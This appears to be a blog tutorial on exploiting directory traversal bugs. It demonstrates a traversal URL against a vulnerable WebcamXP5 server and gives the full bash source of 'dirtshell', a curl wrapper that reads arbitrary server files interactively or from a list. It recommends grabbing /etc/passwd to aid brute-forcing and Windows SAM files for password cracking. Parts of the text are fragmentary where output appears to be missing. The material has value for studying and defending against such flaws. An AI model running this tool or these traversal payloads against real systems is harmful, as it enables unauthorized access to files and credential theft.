
Web applications that are vulnerable to directory traversals offer a small window into viewing the contents of a target server. In a way, you've semi-penetrated the system, albeit with minimal privileges, mostly just reading files. However, that's not necessarily a bad thing. Being able to read /etc/passwd
for instance will give you an idea of what user accounts are on the system, thereby aiding in a brute force attack. If you can read the contents of C:\Windows\repair\sam
and C:\Windows\repair\system
, you can download those files and start cracking Windows passwords.
Let's have a quick look at a web application that's vulnerable to a directory traversal attack. Here we've found a target that's running a vulnerable version of WebcamXP5:

C:\boot.ini
:
http://ifrit.techorganic.com:8080/..\..\..\..\..\..\..\..\..\..\..\boot.ini

dirtshell
. Let's have a look: 
dirtshell
. Once the shell starts, we can just type in the path and file that we want to read. In this case, we've read the contents of C:\boot.ini
and C:\Windows\system.ini
. In a way, it looks like we've got a shell in the server itself. Ok so that's great, but the process of typing each file and hitting Enter to view the result still takes a little time. dirtshell
can take a file with a list of files that we want to read. For example, let's create a file called check.txt
with the following:
We can tell
\\boot.ini
\\windows\\win.ini
\\windows\\system.ini
dirtshell
to read that file and just print the output of each file specified if it exists. No interaction with the user required: 
dirtshell
automatically read them for us. Here's the code for the program:
#!/bin/bash
function usage {
echo "usage: $0 [-p prefix] [-s suffix] [-f input.txt] -u URL"
echo "eg : $0 -p \"../../../../\" -s \"\" -u \"http://vulnsite.com/test.php?page=\""
}
if [[ -z $1 ]]; then
usage
exit 0;
fi
prefix=""
suffix=""
url=""
cmdfile=""
rfifile=""
while getopts "p:s:u:f:" OPT; do
case $OPT in
p) prefix=$OPTARG;;
s) suffix=$OPTARG;;
u) url=$OPTARG;;
f) cmdfile=$OPTARG;;
*) usage; exit 0;;
esac
done
if [[ -z $url ]]; then
usage
exit 0;
fi
which curl &>/dev/null
if [[ $? -ne 0 ]]; then
echo "[!] curl needs to be installed to run this script"
exit 1
fi
# read files from a file and print to stdout
if [[ ! -z $cmdfile ]]; then
if [[ -f $cmdfile ]]; then
for i in $(cat $cmdfile); do
echo "[+] requesting ${url}${prefix}${i}${suffix}"
curl "${url}${prefix}${i}${suffix}"
done
fi
else
# interactive shell
while :; do
printf "[>] "
read cmd
echo "[+] requesting ${url}${prefix}${cmd}${suffix}"
curl "${url}${prefix}${cmd}${suffix}"
echo ""
done
fi
dirtshell
has three options that can be specied. The -u
specifies the URL that you're targetting, so it's mandatory. The -p
option as we've already seen, specifies the prefix such as "../../../" or "\..\..\..". The -s
option specifies the suffix, for instance "" when dealing with php files that need to be null terminated.